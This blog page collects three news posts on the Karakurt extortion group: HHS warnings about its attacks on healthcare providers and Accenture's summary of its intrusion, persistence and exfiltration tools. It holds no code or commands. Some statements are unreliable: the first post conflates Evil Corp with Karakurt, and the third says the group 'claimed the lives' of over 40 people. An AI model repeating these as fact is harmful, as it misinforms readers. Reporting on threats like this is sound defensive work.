Search This Blog

Showing posts with label Karakurt. Show all posts

HHS Warns, Karakurt Ransomware Group Targeting Healthcare Providers


The US Department of Health and Human Services Cybersecurity Coordination Center (HC3) recently issued a warning about rising Karakurt activities against the healthcare centre. The department has now issued a new warning about Evil Corp attacks. 

According to the alert, Evil Corp is supposedly obtaining intellectual property from the United States healthcare sector on behalf of the Russian government. Evil Corp's Dridex trojan is competent in compromising the confidentiality and accessibility of operational systems and data, including financial and health data. 

The threat actor has constantly changed its tactics in order to avoid sanctions imposed by the US government, causing millions of dollars in damage.

Evil Corp has a plethora of tools and techniques at its disposal, which are frequently combined with commodity malware and off-the-grid tactics. Furthermore, HC3 is concerned because nation-state-sponsored threat actors, such as Evil Corp, see data exfiltration as a cost-effective way to steal intellectual property. 

In addition to the aforementioned, Evil Corp makes no distinction between large and small organisations, preferring to target wherever there is an opportunity. Karakurt has at least compromised an assisted living facility, a healthcare provider, a hospital, and a dental clinic, according to HC3. The group even transformed its leak site into a searchable database, making it easier to locate victims.

The healthcare sector has long been a favourite target of cybercriminals, and this has only increased since the pandemic's onslaught. On a regular basis, various threat groups target the sector. As a result, putting in place the necessary security measures is advised.

HHS Alerts Healthcare Workers on Karakurt Ransomware Group

A new wave of cyber attacks from the Karakurt ransomware gang are reported to healthcare providers. The warning came months after CISA and FBI disclosed operational technical data on the group, along with evidence of infiltration and mock ransom notes.

A dentistry practice, an assisted care facility, a supplier, and a hospital were all impacted by the attacks. The healthcare industry should continue to be on high alert and keep an eye out for any signs of compromise, experts assert. 

According to HC3, Karakurt's "massive cyberbullying efforts against victims to disgrace them are what is most alarming."

Karakurt has been seen buying stolen login details or acquiring access to users who have already been hacked through third-party intrusion broker networks in order to access victim machines.

Fortinet FortiGate SSL VPN appliances, Log4Shell, old Microsoft Windows Server instances, and outdated SonicWall SSL VPN appliances are just a few examples of the intrusion flaws the organization is known to use to get initial access.

HHS Alert 

Karakurt first emerged in late 2021, according to a warning from the Department of Health and Human Services Cybersecurity Coordination Center (HC3), they are likely connected to the Conti ransomware organization, either through a working relationship or as a side company.

Given that the Conti ransomware organization has successfully attacked more than 16 healthcare providers since early 2021, federal agencies have long issued warnings about the risk attached to the sector.

Similar to other ransomware groups, the Karakurt actors claim data theft and threaten to sell it on the dark web or make it available to the general public if their demands are not met. The ransoms range from $25,000 to $13,000,000 in Bitcoin, and the timeframes are frequently set to expire just one week after the fraudsters make contact.

According to open-source reports, Karakurt threat actors typically conduct scanning, reconnaissance, and collecting on their targets for roughly two months. The organization then makes an attempt to acquire access to documents that include private data, including Social Security numbers, medical record numbers, medical history, and information about treatments. The gang retains the data and threatens its victims until they pay, as is customary with ransomware.

The recent Karakurt campaign against Methodist McKinney Hospital in early July provided evidence of this. The actors threatened to make the allegedly stolen material available, but Methodist McKinney instead alerted patients of the incident and the ongoing inquiry into the potential data theft.

‘Karakurt’ Extortion Back with an Upswing


As of late, a new money-driven attack group has been on the upswing, and unlike previous groups, it does not appear to be interested in spreading ransomware or attacking high-profile targets. 

Accenture Security researchers have been investigating a group that calls itself "Karakurt," meaning "black wolf" in Turkish, and is also the name of a deadly spider prevalent in eastern Europe and Siberia. 

Karakurt specializes in data exfiltration and eventual extortion, which allows them to operate swiftly. It already has claimed the lives of more than 40 people until September, with 95 percent of them in North America and the rest in Europe, according to a paper released on Friday by academics. 

Experts suggest Karakurt would be a trend-setter, and shortly, similar groups may shift away from attacking large corporations or critical-infrastructure providers with ransomware and instead take a similar exfiltration/extortion technique. 

“The threat group is financially motivated, opportunistic in nature, and so far, appears to target smaller companies or corporate subsidiaries versus the alternative big-game hunting approach,” read the report.

According to Accenture CIFR researchers, Karakurt was originally spotted by investigators outside of Accenture Security in June since it started building up its network and data-leak platforms. In August, the group registered the domains and, as well as the Twitter, handle @karakurtlair. Shortly the organization launched its first successful attack. 

Accenture Security's collecting sources and intrusion research discovered the organization's first target in September; two months later, the group revealed their victim on the website.

Karakurt's tactics, techniques, and procedures (TTP) for infiltrating victim infrastructures, accomplishing persistence, relocating laterally, and stealing data are similar to those used by numerous threat actors and the group frequently takes a "living off the land" strategy relying on the attack surface, i.e., utilizing tools or features which already belong across the targeted system. 

Karakurt primarily employs service installation, remote-management software, and the delivery of command-and-control (C2) beacons throughout victim environments via Cobalt Strike to sustain persistence once connected to a network. 

However, experts have noticed that the group recently appears to have changed methods in its implementation of backup persistence. Karakurt "persisted within the victim's network via the VPN IP pool or installed AnyDesk to allow external remote access to compromised devices" rather than delivering Cobalt Strike, they stated. This enables the gang to migrate laterally by leveraging previously obtained user, service, and administrator personal information. 

Researchers stated the gang will also employ additional remote-management technologies, such as remote desktop protocol (RDP), Cobalt Strike, and PowerShell commands, to travel laterally and uncover relevant data to steal and exploit for extortion reasons as needed. 

Nevertheless, the group's assault pattern thus far demonstrates that it is adaptable enough to change its techniques based on the victim's circumstances. Karakurt can also avoid detection in many circumstances since it frequently utilizes authorized credentials to access websites. 

Ultimately, Karakurt employs 7zip and WinZip for data compression, along with Rclone or FileZilla (SFTP) for staging and final exfiltration to cloud storage, to steal information. Also according to Accenture Security, the staging folders utilized to exfiltrate data in assaults were C:Perflogs and C:Recovery. 

Researchers offered standard mitigation recommendations to enterprises to prevent being penetrated and extorted by Karakurt, which will call them several times to put pressure over them to pay once their data has been stolen.